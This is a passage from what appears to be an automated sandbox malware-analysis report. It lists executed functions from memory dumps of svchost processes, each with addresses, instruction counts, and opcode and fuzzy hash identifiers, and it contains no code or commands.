                                                  • Opcode Fuzzy Hash: 20e5d54e07ef3175a18f8c33e7f363fcdc670f176acb889d32fc013dd67261d1
                                                  • Instruction Fuzzy Hash: 7B21EA52B1D9594FEB5967BC5C3A7B86BD1EF98750F0402BAE01CC31D6DE1869414341
                                                  Function 00007FFD9B890870 Relevance: .1, Instructions: 96COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2944260432.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_7ffd9b890000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 45d51851309bd3049885880213be7a34293621a3546f6aac3d1f05aca403a14c
                                                  • Instruction ID: 75f5915644c8ebcd52274a6b513d209ad7494b9a9e075e91441e38c5bb0038ca
                                                  • Opcode Fuzzy Hash: 45d51851309bd3049885880213be7a34293621a3546f6aac3d1f05aca403a14c
                                                  • Instruction Fuzzy Hash: 93319320B9994D5FD348FB2CA4B68A9BF71FFC8200BC484A5D419C77CADE346942C742
                                                  Function 00007FFD9B892421 Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2944260432.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_7ffd9b890000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 288e33c407eb75844795e7d22496e496ab1ecaa2a59c61eee3e14576a0f8b166
                                                  • Instruction ID: 3cf06439b94778edcbfbc9b44ab589b5485c8f0f64733acbfa1b7a4f4f4c6650
                                                  • Opcode Fuzzy Hash: 288e33c407eb75844795e7d22496e496ab1ecaa2a59c61eee3e14576a0f8b166
                                                  • Instruction Fuzzy Hash: 90017B15A0E6990FEB59AB785C718757FF0DF99310B0905BBE888C71E7D908AA418382
                                                  Function 00007FFD9B890E67 Relevance: .0, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2944260432.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_7ffd9b890000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ec2f75e429efb6f76cf7ea0b66d1eb9c10856d0bdffb807d63645f3b59387f15
                                                  • Instruction ID: efe73fa74dd170e589f084237ffbb50d94b543b2c4b7a9d0f5ff36c6d2b89227
                                                  • Opcode Fuzzy Hash: ec2f75e429efb6f76cf7ea0b66d1eb9c10856d0bdffb807d63645f3b59387f15
                                                  • Instruction Fuzzy Hash: 05E06D21F1491D4FEF44BBACA8557FCA2D2EB8C616F100177D61DC329ADE2858028381

                                                  Executed Functions

                                                  Function 00007FFD9B8A09FA Relevance: 2.6, Strings: 2, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3530611759.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: :M_^$k:M
                                                  • API String ID: 0-4016585720
                                                  • Opcode ID: 7f384c46407f87ab70c4cb98aa26fca2e5f1f7c0fdb9c37e58a745140368e15d
                                                  • Instruction ID: 002624ae95b24f00070e4224984cc128ce93d50c3f3842865c8409bf0b040c84
                                                  • Opcode Fuzzy Hash: 7f384c46407f87ab70c4cb98aa26fca2e5f1f7c0fdb9c37e58a745140368e15d
                                                  • Instruction Fuzzy Hash: 1801A75B7095A989D3077BADB8554ECBB90DE86339B0843F3D2C98D0839914508797C5
                                                  Function 00007FFD9B8A05FA Relevance: .4, Instructions: 409COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3530611759.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3b11f5e29d0836b658e65815287541afc871b08c8aad991cc35aad4bd9ecc4f3
                                                  • Instruction ID: 70d044e13687e44d62943d551e9802266829c4703039b329bb930eb75edddc61
                                                  • Opcode Fuzzy Hash: 3b11f5e29d0836b658e65815287541afc871b08c8aad991cc35aad4bd9ecc4f3
                                                  • Instruction Fuzzy Hash: 36C17723B0F6994FD319A7ACBC754E8BF60EF8172574802B7D09D871D7ED28A9068391
                                                  Function 00007FFD9B8A0A68 Relevance: .3, Instructions: 279COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3530611759.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 422342f545bb6fa770786bcd213ecec8dd66db981d5e21a5bd566670e06f6ba2
                                                  • Instruction ID: 1b942fa5ee171873e8579c65598d7a8563b345779fa4baa9cbc9e93a7ad423b3
                                                  • Opcode Fuzzy Hash: 422342f545bb6fa770786bcd213ecec8dd66db981d5e21a5bd566670e06f6ba2
                                                  • Instruction Fuzzy Hash: 9B716826B1996E8AD709BB7CBC256ED7BA0EF85324B4442B7D00DCB1C7DD24644683D0
                                                  Function 00007FFD9B8A0705 Relevance: .3, Instructions: 262COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3530611759.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e245f9c3f530ffb8efe19ed57d77157155d34942017d027fc4a0bfc6d43e6a70
                                                  • Instruction ID: 0940f870d55b9914233d07a66d7061904f2bc69c02174768cf0336a604369507
                                                  • Opcode Fuzzy Hash: e245f9c3f530ffb8efe19ed57d77157155d34942017d027fc4a0bfc6d43e6a70
                                                  • Instruction Fuzzy Hash: 1B816862B0F9894FD319AB6C68754E8BF60EF4570474840FBD09D876DBED38A902C782
                                                  Function 00007FFD9B8A0BF2 Relevance: .2, Instructions: 157COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3530611759.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: de06ed84acfcec93d4bdaa7a9be35027e8a9e9b78c93452e9d26ab49aa758479
                                                  • Instruction ID: 81dd880c9c9ba983e97c13f20fb0900a8cdfffccee0ea40e3e4be977ab320ac6
                                                  • Opcode Fuzzy Hash: de06ed84acfcec93d4bdaa7a9be35027e8a9e9b78c93452e9d26ab49aa758479
                                                  • Instruction Fuzzy Hash: 6B413625B19A5D9FEB48FBAC98616EC7BE1FF88300F4445B6D009C72C7DE24A542C791
                                                  Function 00007FFD9B8A0EEE Relevance: .1, Instructions: 122COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3530611759.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: daf2250d41d4bfa8eff4e015cca03abd1269c32249b7d4507b1669c3706c3c79
                                                  • Instruction ID: f685b8cf933d785876afbab187cc8cebc786bd89f09b6737795a8dd373f704b6
                                                  • Opcode Fuzzy Hash: daf2250d41d4bfa8eff4e015cca03abd1269c32249b7d4507b1669c3706c3c79
                                                  • Instruction Fuzzy Hash: 10314B11B1EA8A0FE7A5A7784869A753BD2EF9A61470940FAD48DC31E7DD08AC038352
                                                  Function 00007FFD9B8A0D81 Relevance: .1, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3530611759.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 39d8834b6f45c188957eaf5e477921206e2725c3f7f5111ae5d71cd66e37c10a
                                                  • Instruction ID: 73f409b1edb0e2a466ea2b8c30110559b8874984d12259c42338263cf9d35d62
                                                  • Opcode Fuzzy Hash: 39d8834b6f45c188957eaf5e477921206e2725c3f7f5111ae5d71cd66e37c10a
                                                  • Instruction Fuzzy Hash: 4B21E152B19A494FE759A7B85C2A6B877D2EF98740F0403BAE00CC31D6EE1868428352
                                                  Function 00007FFD9B8A0E67 Relevance: .0, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3530611759.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6612891d5c1cb9611464f8079bb196cede8a8c0772d68f84c113412ab0e064bd
                                                  • Instruction ID: d4a1be4dbb91d95f671ba3bb4479e002fd0361fa0f5342f78bc72855bd9b8427
                                                  • Opcode Fuzzy Hash: 6612891d5c1cb9611464f8079bb196cede8a8c0772d68f84c113412ab0e064bd
                                                  • Instruction Fuzzy Hash: B7E06D21B1490D4FEF44BBACA8557FCB2D2EB8C616F1002B7D51DC329ADE2858028391

                                                  Executed Functions

                                                  Function 00007FFD9B8B1779 Relevance: .9, Instructions: 907COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.4127296145.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f441501c9d5f5477b9e8a2078ac0de71ea546c9f86f4223ae14fb2b3ab5b456e
                                                  • Instruction ID: af22dc5a551fba1729b7b50c091d840657c1ab126b249e468b6f53ffaed5af9f
                                                  • Opcode Fuzzy Hash: f441501c9d5f5477b9e8a2078ac0de71ea546c9f86f4223ae14fb2b3ab5b456e
                                                  • Instruction Fuzzy Hash: 9252A621B29A5D4FE768FB7894756B9B7D2FF9C300F4405B9E05EC32D6DE28A8018781
                                                  Function 00007FFD9B8B2259 Relevance: .2, Instructions: 203COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.4127296145.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dfb80b09dcea574c6f6e1be4886c93f6be0389ef68758cd02425701ce6851756
                                                  • Instruction ID: 196e9966820abf0049c6b08bcccb5b0426b3f43bf805a104f98be84d2775e3f2
                                                  • Opcode Fuzzy Hash: dfb80b09dcea574c6f6e1be4886c93f6be0389ef68758cd02425701ce6851756
                                                  • Instruction Fuzzy Hash: 5E51FF11B0E6C90FD796ABB85835675BFE0DF9B219B0800FBE099C71E7DD081806C382
                                                  Function 00007FFD9B8B09FA Relevance: 2.6, Strings: 2, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.4127296145.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: :L_^$k:L
                                                  • API String ID: 0-2007851088
                                                  • Opcode ID: 3ae2815b22d4748dcda899e01171a4bf352aebcfef83c12133de718c7890032d
                                                  • Instruction ID: 1e5f636febffa4ba0124d884811f75e14e4fccf51974d01fc275853f6f548afa
                                                  • Opcode Fuzzy Hash: 3ae2815b22d4748dcda899e01171a4bf352aebcfef83c12133de718c7890032d
                                                  • Instruction Fuzzy Hash: 3B012B177085A289D3077BBDB8554FCBB90DE86379B4801F3C2C98E0A7D51450CB83C6
                                                  Function 00007FFD9B8B130D Relevance: .5, Instructions: 512COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.4127296145.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 247967981d37a36290cfed2e8e200d853d2c95edbdbe9ddd8a0e7e1346c3e5a8
                                                  • Instruction ID: bd34e361bda90065772161a5c7b002d741e69dae165aeff7d5f416a657d138eb
                                                  • Opcode Fuzzy Hash: 247967981d37a36290cfed2e8e200d853d2c95edbdbe9ddd8a0e7e1346c3e5a8
                                                  • Instruction Fuzzy Hash: 1C41E433F19A5A4FD755E7BCE8754ED7BB1FF4A250B4501B7D089DB1A2ED2828028780
                                                  Function 00007FFD9B8B05FA Relevance: .4, Instructions: 406COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.4127296145.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c490b7e9def61ab0963fc56050ce8ea54c6b00466282a4ff1cf132e7aeb4ee3c
                                                  • Instruction ID: 7f998dd9f279ff9b6d898493310df4f513d3dc5af7d0aa5ee6b2778236848bf3
                                                  • Opcode Fuzzy Hash: c490b7e9def61ab0963fc56050ce8ea54c6b00466282a4ff1cf132e7aeb4ee3c
                                                  • Instruction Fuzzy Hash: F5C16A12B1EAAA4FD319A7BCBC754E97BA0FF8136574840BBC088871E7DD286406C7D1
                                                  Function 00007FFD9B8B0A68 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.4127296145.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f3cf9259c5ed63c1fd578bb92cbecfe882494ed12acd8227acb18e04adafda0d
                                                  • Instruction ID: b177433634f5edebc30a8129766f83d9676fb7ce27bdcde7f9fca3dd96d3d91e
                                                  • Opcode Fuzzy Hash: f3cf9259c5ed63c1fd578bb92cbecfe882494ed12acd8227acb18e04adafda0d
                                                  • Instruction Fuzzy Hash: BF717826B1896A9ED70ABBBCBC619ED7BA0EF86324B4401B7C049C71D7CD24604BC7C1
                                                  Function 00007FFD9B8B0705 Relevance: .3, Instructions: 259COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.4127296145.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 02175ec92fe4e58aab529759e571ad4a6f697a31561f986baca51f10d7cc08d7
                                                  • Instruction ID: a1292e80452956ba4568ea4968d31727171cb4dc2d9f20127a47aaeee4c539e8
                                                  • Opcode Fuzzy Hash: 02175ec92fe4e58aab529759e571ad4a6f697a31561f986baca51f10d7cc08d7
                                                  • Instruction Fuzzy Hash: C3812B25B1E9DD8FD349EBBC68715E9BBE0FF4520474840FAD088872E7DD286806CB81
                                                  Function 00007FFD9B8B0EEE Relevance: .2, Instructions: 202COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.4127296145.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8e715dd95f5b01697de56b875bd7173870e61b7d2529723c042caa13c189bc07
                                                  • Instruction ID: 1e0aab3df6737e23fe28f95829fd9b1dde9e82936866989819d54bb982bedc2f
                                                  • Opcode Fuzzy Hash: 8e715dd95f5b01697de56b875bd7173870e61b7d2529723c042caa13c189bc07
                                                  • Instruction Fuzzy Hash: C3514921B1E69A0FE35AA77C58765B57BD1DF8622470940FBD08CC72EBDC0C58478752
                                                  Function 00007FFD9B8B0BF3 Relevance: .2, Instructions: 156COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.4127296145.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 63f60fa06676eb5aae1a3e564f453946d5a45049eb59126d8cebc75faa47b5a2
                                                  • Instruction ID: adebb47d400679ab9dd82909d30192716012f910c6ad82b32dc7317cc26f32ab
                                                  • Opcode Fuzzy Hash: 63f60fa06676eb5aae1a3e564f453946d5a45049eb59126d8cebc75faa47b5a2
                                                  • Instruction Fuzzy Hash: C641F721B19A5E9FDB49FBBC98616ED7BE1FF89300F440576C008C72D7DE28A4468791
                                                  Function 00007FFD9B8B0650 Relevance: .1, Instructions: 138COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.4127296145.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0bf69fbf55a10212b8d54514c0f38d147bd18d7e8276a7696cf4599082da6f10
                                                  • Instruction ID: b2e9445097940af3c055109b06febbdbb1374b8d26a8a1cc94923578b9e59516
                                                  • Opcode Fuzzy Hash: 0bf69fbf55a10212b8d54514c0f38d147bd18d7e8276a7696cf4599082da6f10
                                                  • Instruction Fuzzy Hash: 3931D621B1C9480FE798EB6C586A679B7C2EF9D315F0401BAE01EC32EBDD18AC418741
                                                  Function 00007FFD9B8B0D81 Relevance: .1, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.4127296145.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bb56a706f181337e04144df5daaa0331acd9fd5a08ebf9a0372fe13d4d76275d
                                                  • Instruction ID: 84ed47f7e6a5dfff917c67434034cc3668c8211430212dbefee4a84cc2ce4442
                                                  • Opcode Fuzzy Hash: bb56a706f181337e04144df5daaa0331acd9fd5a08ebf9a0372fe13d4d76275d
                                                  • Instruction Fuzzy Hash: 55210752B1DA594FE759B7BC5C3A7B837D1EF98740F0402BAE00CC31D6EE1869428782
                                                  Function 00007FFD9B8B0870 Relevance: .1, Instructions: 96COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.4127296145.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: df5934d0d450e4625f30261569d9a90eab6dfb3c94a4e5d684e580f3cd276fbb
                                                  • Instruction ID: c9fc95b6794ecd2006b7e7ddc94247da61801792dfe43648b07fabeb76443d76
                                                  • Opcode Fuzzy Hash: df5934d0d450e4625f30261569d9a90eab6dfb3c94a4e5d684e580f3cd276fbb
                                                  • Instruction Fuzzy Hash: A5318420724D8D9FD388FB6CA4A19A9BBF1FF88244BC481E5D459C33CADE386801C742
                                                  Function 00007FFD9B8B2421 Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.4127296145.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 79e9c2f72961cceeff8e0e2a9c3bbc59a5845afc093a44b339028e93ebc52f50
                                                  • Instruction ID: d0a146f006e7b7bbe14aad338b9074962dd0c06672261740bda18c0e85edf9d1
                                                  • Opcode Fuzzy Hash: 79e9c2f72961cceeff8e0e2a9c3bbc59a5845afc093a44b339028e93ebc52f50
                                                  • Instruction Fuzzy Hash: 0E017014A0E6A94FE755AB7C6C714357FF0DF9921070505BBE4C8C71E7D908664587C2
                                                  Function 00007FFD9B8B0E67 Relevance: .0, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.4127296145.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4d0598652a4655a2c1ac09468ab4351308726f62b176886f69071661fd946fd6
                                                  • Instruction ID: 08c63b5c605943213cd53b8e428da500bde8beaddc7a743e666a5662f2767bd8
                                                  • Opcode Fuzzy Hash: 4d0598652a4655a2c1ac09468ab4351308726f62b176886f69071661fd946fd6
                                                  • Instruction Fuzzy Hash: B5E06D21B1491D4FEF44BBACA8556FCB2D2EB8C616F100177D51DD329ADE2898028381